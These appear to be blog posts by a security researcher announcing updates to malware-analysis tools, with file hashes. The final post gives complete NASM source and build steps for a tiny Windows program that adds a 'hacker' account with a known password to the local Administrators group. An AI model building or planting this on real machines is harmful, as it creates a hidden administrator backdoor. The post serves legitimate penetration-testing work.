This new version of numbers-to-string.py, a tool to extract numbers from text files and convert them to strings, adds a verbose option (-v –verbose).
Example:
Running this with verbose option shows which lines were selected for number extraction:
numbers-to-string_v0_0_10.zip (https)
MD5: C7B8985C5A7D856F68A88BBD491375E6
SHA256: 8CED403C795E9287DD1500C8A0EFBF41F8837BE112113D425A7F8C97D9D1A27E
This is a bugfix version
pecheck-v0_7_11.zip (https)
MD5: D3B69575F0A08377D1A08886D34230FD
SHA256: 2B59F745377EABDF81118997CA70F5F4DBC1CE927370F02C6E0262869F988FA9
There are many new features in this update to InteractiveSieve (I neglected to publish updates).
InteractiveSieve is a C# tool I developed to help me visualize and sift through logs (CSV files).
I want to record a couple of videos to show what this tool can do.
Here is a list of updates:
InteractiveSieve_V_0_9_1_0.zip (https)
MD5: C8B5B3E768FB62B7508F055122453594
SHA256: 063A83D9DBA900C8B245532D510E822A305B258C9A3DD05F19F4F0ED2753B6E1
I added detection of data descriptor records (PK 0x07 0x08) to option -f L (list all ZIP records found inside the provided file).
zipdump_v0_0_20.zip (https)
MD5: A0A826BB92805997ED3D9793C8B24385
SHA256: AC626299A6048FA4A7E8BE2993411870F77B4B89F647B6C4264E0CC22E180999
This new version of oledump.py brings support for AES encrypted ZIP files via Python module pyzipper (Python 3 only). If module pyzipper is not installed, oledump will fall back to builtin module zipfile.
And plugin plugin_vbaproject.py does now a small dictionary attack on the extracted hash to try to recover the password.
I use the same dictionary as in zipdump.py, a dictionary that is the public domain, default wordlist used by John the Ripper, extended with a couple of passwords: infected, P@ssw0rd and VelvetSweatshop.
oledump_V0_0_52.zip (https)
MD5: 2528824D8A7CD2BE98615B1B1AE8C61A
SHA256: C47A9CC658571FF23E70264B4DD4F8F47D244708E7110EA0A28128F175CF80F5
This is a bugfix update to oledump.py, and a feature update for plugins.
plugin_biff.py has a new -S (–statistics) option:
This option can be combined with option -c (–csv).
And there is a new plugin for VBA projects: plugin_vbaproject.py. More info in tomorrow’s blog post.
oledump_V0_0_51.zip (https)
MD5: 9A55FC37AD0C4C2F3D08F252C72C1A82
SHA256: 071D1605D520A4BABBE2CDA461866C349628FE4B428AC54823492A6CD89EA487
This is a small bug fix version of XORSearch: fixing some printf format strings for Linux, thanks to Lenny Zeltser for reporting.
Because of Google, I can no longer host this tool on my website.
You have to get it from my FalsePositives GitHub repository.
XORSearch_V1_11_4.zip
MD5: E66290D1EB15D9394C8D1264A09ECFE6
SHA256: BF20A1D76AAD83FC3AABEDC6DDC7F96B655DC94BEC3FA276A50AF6046EBB554C
This new version of base64dump.py adds the following new features:
base64dump_V0_0_12.zip (https)
MD5: 834B0D2DB5915ECE1C2F016B9E8462D1
SHA256: 952A5009C945AF350DB0875E8F025E3B5D271FB54AC60BE7569CFBD949DD7B77
This is a small Python 3 bugfix version.
translate_v2_5_8.zip (https)
MD5: 677BD5D6007F264A05D23A9A01B3DD13
SHA256: 977D7A87F771F5E86A6B57D2B565D7C789A7AC7696599E8B7412E9051D66DCFF
I wrote a tiny EXE program (1,5 KB) that creates an account and adds it to the local administrators group.
It’s written in 32-bit assembly code (it’s not shellcode), and needs to be assembled with nasm and then linked to a PE file.
The first 3 %define statements define the account name, password and local group.
; Assembly code to add a new local user and make it member of Administrators group ; Written for NASM assembler (http://www.nasm.us) by Didier Stevens ; https://DidierStevens.com ; Use at your own risk ; ; Build: ; nasm -f win32 add-admin.asm ; Microsoft linker: ; link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib ; https://blog.didierstevens.com/2018/11/26/quickpost-compiling-with-build-tools-for-visual-studio-2017/ ; /fixed -> no relocation section ; /debug:none /EMITPOGOPHASEINFO -> https://stackoverflow.com/questions/45538668/remove-image-debug-directory-from-rdata-section ; /filealign:256 -> smaller, but no valid exe ; MinGW linker: ; ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32 ; ; History: ; 2020/03/13 ; 2020/03/14 refactor ; 2020/03/15 refactor BITS 32 %define USERNAME 'hacker' %define PASSWORD 'P@ssw0rd' %define ADMINISTRATORS 'administrators' global _main extern _NetUserAdd@16 extern _NetLocalGroupAddMembers@20 extern _ExitProcess@4 struc USER_INFO_1 .uName RESD 1 .Password RESD 1 .PasswordAge RESD 1 .Privilege RESD 1 .HomeDir RESD 1 .Comment RESD 1 .Flags RESD 1 .ScriptPath RESD 1 endstruc struc LOCALGROUP_MEMBERS_INFO_3 .lgrmi3_domainandname RESD 1 endstruc USER_PRIV_USER EQU 1 UF_SCRIPT EQU 1 section .text _main: mov ebp, esp sub esp, 4 ; NetUserAdd(NULL, level=1, buffer, NULL) lea eax, [ebp-4] push eax push UI1 push 1 push 0 call _NetUserAdd@16 ; NetLocalGroupAddMembers(NULL, administrators, level=3, buffer, 1) push 1 push LMI3 push 3 push ADMINISTRATORS_UNICODE push 0 call _NetLocalGroupAddMembers@20 ; ExitProcess(0) push 0 call _ExitProcess@4 ; uncomment next line to put data structure in .data section (increases size PE file because of extra .data section) ; section .data UI1: istruc USER_INFO_1 at USER_INFO_1.uName, dd USERNAME_UNICODE at USER_INFO_1.Password, dd PASSWORD_UNICODE at USER_INFO_1.PasswordAge, dd 0 at USER_INFO_1.Privilege, dd USER_PRIV_USER at USER_INFO_1.HomeDir, dd 0 at USER_INFO_1.Comment, dd 0 at USER_INFO_1.Flags, dd UF_SCRIPT at USER_INFO_1.ScriptPath, dd 0 iend USERNAME_UNICODE: db __utf16le__(USERNAME), 0, 0 PASSWORD_UNICODE: db __utf16le__(PASSWORD), 0, 0 ADMINISTRATORS_UNICODE: db __utf16le__(ADMINISTRATORS), 0, 0 LMI3: istruc LOCALGROUP_MEMBERS_INFO_3 at LOCALGROUP_MEMBERS_INFO_3.lgrmi3_domainandname, dd USERNAME_UNICODE iend
